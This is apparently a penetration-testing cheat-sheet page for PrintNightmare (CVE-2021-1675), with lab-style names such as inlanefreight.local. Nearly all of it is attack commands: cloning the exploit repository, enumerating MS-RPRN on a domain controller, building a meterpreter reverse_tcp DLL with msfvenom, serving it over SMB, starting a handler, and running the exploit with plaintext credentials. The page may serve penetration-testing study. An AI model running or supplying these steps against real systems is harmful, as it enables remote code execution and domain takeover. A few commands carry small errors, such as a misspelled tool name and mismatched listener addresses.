print-nightmare

Install the tool

git clone https://github.com/cube0x0/CVE-2021-1675.git && pip3 uninstall impackets && git clone https://github.com/cube0x0/impacket && cd impacket && python3 ./setup.py install

Enumerate `MS-RPRN` (check Print System Asynchronous Protocol and System Remote Protocol are exposed)

rpcdum.py @<DC_machine_IP> | egrep 'MS-RPRN|MS-PAR'

Generate a DLL payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.225 LPORT=8080 -f dll > backupscript.dll

sudo smbserver.py -smb2support CompData /path/to/backupscript.dll

Config & start MSF multi/handler

Use multi/handler

Set LHOST 172.16.5.255

Run the exploit

sudo python3 CVE-2021-1675.py inlanefreight.local/forend:Klmcargo2@<DC_machine_IP> '\\172.16.5.225\CompData\backupscript.dll'

PreviousPetitPotam (MS-EFSRPC) (without authentication to the domain)Nextprinter-bug-ms-prn

Last updated 1 month ago

hashtagInstall the tool

hashtagEnumerate MS-RPRN (check Print System Asynchronous Protocol and System Remote Protocol are exposed)

hashtagGenerate a DLL payload

hashtagCreate a SMB share

hashtagConfig & start MSF multi/handler

hashtagRun the exploit

Install the tool

Enumerate `MS-RPRN` (check Print System Asynchronous Protocol and System Remote Protocol are exposed)

Generate a DLL payload

Create a SMB share

Config & start MSF multi/handler

Run the exploit